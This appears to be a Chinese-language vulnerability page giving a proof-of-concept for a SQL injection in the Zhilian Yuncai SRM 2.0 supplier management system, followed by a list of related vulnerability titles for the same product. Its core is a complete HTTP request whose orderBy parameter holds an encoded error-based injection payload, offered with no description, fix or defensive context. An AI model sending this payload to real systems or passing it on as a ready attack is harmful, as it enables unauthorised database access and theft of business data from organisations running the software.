智联云采 SRM2.0 /adpweb/api/srm/delivery/quickReceiptDetail SQL 注入漏洞

漏洞描述

PoC代码

GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐

• 智联云采 SRM2.0 restore 存在远程命令执行漏洞
• POC 智联云采 SRM2.0 /adpweb/api/srm/delivery/receiptDetail SQL 注入漏洞
• 智联云采 SRM2.0 /a/srm/inquiry/getSuppliers SQL 注入漏洞
• POC 智互联SRM智联云采系统 statusList SQL注入漏洞
• POC SRM智联云采系统 receiptDetail 存在sql注入
• SRM智联云采系统 statusList 存在sql注入
• POC SRM智联云采系统 quickReceiptDetail 存在sql注入
• 智互联(深圳)科技有限公司SRM智联云采系统inquiry存在SQL注入漏洞
• POC 智互联SRM智联云采系统 inquiry/getSuppliers SQL注入漏洞
• 智联云采 SRM2.0 /adpweb/a/ica/api/testService SQL 注入漏洞
• SRM智联云采系统 /adpweb/druid/submitLogin 弱口令漏洞
• 智联云采 SRM2.0 /autologin 权限绕过漏洞
• SRM智联云采系统sql注入